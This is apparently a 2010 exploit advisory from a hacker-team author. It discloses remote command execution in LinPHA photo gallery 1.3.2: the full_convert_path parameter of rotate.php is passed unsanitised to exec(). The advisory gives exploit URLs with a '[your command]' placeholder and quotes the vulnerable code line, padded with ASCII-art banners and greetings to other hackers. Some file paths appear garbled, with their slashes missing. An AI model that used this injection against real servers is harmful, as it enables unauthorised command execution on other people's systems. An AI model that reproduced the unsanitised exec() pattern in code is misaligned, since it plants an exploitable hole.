LinPHA <== 1.3.2 ( rotate.php ) Remote Command Execution Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LinPHA <== 1.3.2 ( rotate.php ) Remote Command Execution Vulnerability
# Published : 2010-05-16
# Author : Sn!pEr.S!Te Hacker
# Previous Title : Joomla Component simpledownload Local File Disclosure
# Next Title : EgO v0.7b (fckeditor) Remote File Upload

__           __      ___
 __            __  /'__`        / __  /'__`                 
/_    ___   /_/_L     ___  ,_/ /   _ __       ___    ___     ___ ___          
/  /' _ ` / /_/__<_  /'___  /    /`'__    /'___ / __` /' __` __`   
   / /    / L / __/  _  _   /  __/ __// L / / /   
   _ _ __   ____/ ____\ __\ ____/ _ /_ ____ ____/ _ _ _  
   /_//_//_/ _ /___/  /____/ /__/ /___/  /_/ /_//____//___/  /_//_//_/
               ____/                                           
               /___/

# ----------------------oOO---(_)---OOo-----------------------
# | __ __ |  
# | _____/ /_____ ______/ /_ __ ______ ______ |  
# | / ___/ __/ __ `/ ___/ __ / / / / __ `/ ___/ |  
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |  
# | /____/__/__,_/_/ /_.___/__,_/__, /____/ |  
# | Security Sn!pEr.S!Te /____/ 2o1o |  
# ------------------------------------------------------------
     Remote Command Execution Vulnerability
# ------------------------------------------------------------ 
--------------------------------------------------------------
LinPHA <== 1.3.2 ( rotate.php )

--------------------------------------------------------------

#[+] Author : Sn!pEr.S!Te Hacker #  
# [+] Email : sniper-site@HoTMaiL.coM #  
# [+] T34M Sn!pEr.S!Te Hacker #  
# [+] 16-5-2010 # 
# [+] Script : lmage ? LinPHA Photo Gallery#
# [+] Download:http://sourceforge.net/projects/linpha/files/linpha/linpha-1.3.4/linpha-1.3.4.zip/download # 
# Version: [1.3.2] #

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : linpha-1.3.4actionsrotate.php


http://localhost/linpha-1.3.4actionsrotate.php?full_convert_path= [your command]


htpp://127.0.0.1/linpha-1.3.4actionsrotate.php?full_convert_path= [your command]


exec($full_convert_path.' -rotate '.$rotate.' '.escape_string($img2rotate).' '.escape_string($img2rotate));

line : 78




web site Favorites my  : http://inj3ct0r.com/  & http://www.hack0wn.com/ & http://www.exploit-db.com



friend my : liar - sm Hacker -baby hacker -dmar -saleh Hacker - ALhal alsab -  
            Mr.SaTaN - abo badr - aStoorh alqssim - Ramad Hacker- h-ex - 
            yousfe - Hiter.3rb - QAHER ALRAFDE - DjHacker - My Heart - Mr.koka-